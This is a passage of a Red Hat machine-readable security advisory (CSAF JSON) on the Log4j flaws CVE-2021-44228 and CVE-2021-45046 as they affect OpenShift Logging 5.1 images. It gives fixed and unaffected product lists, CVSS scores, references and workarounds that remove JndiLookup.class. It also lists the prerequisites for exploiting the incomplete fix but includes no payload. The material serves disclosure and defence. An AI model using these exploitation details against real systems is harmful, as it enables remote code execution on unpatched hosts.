Server\n- Red Hat Identity Management\n- Red Hat CloudForms \n- Red Hat Update Infrastructure\n- Red Hat Satellite\n- Red Hat Ceph Storage\n- Red Hat Gluster Storage\n- Red Hat OpenShift Data Foundation\n- Red Hat OpenStack Platform\n- Red Hat Virtualization\n- Red Hat Single Sign-On\n- Red Hat 3scale API Management", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "RHBZ#2030932", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932" }, { "category": "external", "summary": "RHSB-2021-009", "url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228", "url": "https://www.cve.org/CVERecord?id=CVE-2021-44228" }, { "category": "external", "summary": 
"https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228" }, { "category": "external", "summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q", "url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/", "url": "https://www.lunasec.io/docs/blog/log4j-zero-day/" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-10T02:01:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:09:12+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5128" }, { "category": "workaround", "details": "For Log4j versions 
\u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "threats": [ { "category": "exploit_status", "date": "2021-12-10T00:00:00+00:00", "details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog" }, { "category": "impact", "details": "Moderate" } ], "title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value" }, { "cve": "CVE-2021-45046", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-12-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2032580" } ], "notes": [ { "category": "description", "text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. 
A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.", "title": "Vulnerability description" }, { "category": "summary", "text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)", "title": "Vulnerability summary" }, { "category": "other", "text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate; this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are:\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup e.g. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true`) does NOT mitigate this specific vulnerability. 
\nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le", 
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x", 
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le", "8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-45046" }, { "category": "external", "summary": "RHBZ#2032580", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046", "url": "https://www.cve.org/CVERecord?id=CVE-2021-45046" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046" }, { "category": "external", "summary": "https://access.redhat.com/security/cve/CVE-2021-44228", "url": "https://access.redhat.com/security/cve/CVE-2021-44228" }, { "category": "external", "summary": "https://logging.apache.org/log4j/2.x/security.html", "url": "https://logging.apache.org/log4j/2.x/security.html" }, { "category": "external", "summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4", "url": "https://www.openwall.com/lists/oss-security/2021/12/14/4" }, { "category": "external", "summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog" } ], "release_date": "2021-12-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:09:12+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this 
release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64", "8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5128" }, { "category": "workaround", "details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).", "product_ids": [ 